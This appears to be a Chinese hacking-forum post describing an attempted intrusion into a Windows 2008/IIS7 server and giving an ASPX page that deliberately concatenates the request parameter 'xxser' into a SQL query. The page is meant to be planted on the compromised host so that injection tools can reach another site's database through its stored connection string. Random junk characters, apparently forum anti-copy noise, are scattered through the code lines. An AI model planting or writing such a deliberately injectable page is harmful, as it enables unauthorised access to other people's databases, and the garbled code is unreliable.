利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
: \5 O+ u$ P1 f& ~- |) @代码量不多，自己写个拉倒了。烦死了。
- ~7 P$ b$ v, P0 ]3 C, i
% R/ _" ^8 K" A! |​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2 u" w- A: A" q7 [' i6 O- {. K<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
( u5 S/ r2 d" N7 B2 y. [</head>
<body>
7 L( J2 g: b6 U6 y& N4 i! _    <form id="form1" runat="server">
    <div>
  `- `5 A; s7 f0 j     <script language="c#" runat="server">
            
         void page_init(object sender, EventArgs e)
9 U1 x; i  e! N1 e/ B9 d/ Y         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
( [$ Q6 {7 Z# ]8 }2 ^+ I- g0 ^7 e            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
* z1 N: A: F1 z5 g* i4 C             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
  e  V% t( U% e! c" p             Response.Write(x);
             conn.Close();
         }
( G+ |$ n& l, D     
  </script>
    </div>
% O5 ~4 ]5 }3 t+ P; n$ O* T' K    </form>
</body>
</html>
! \: Y; C  p& ?" @4 f% y# U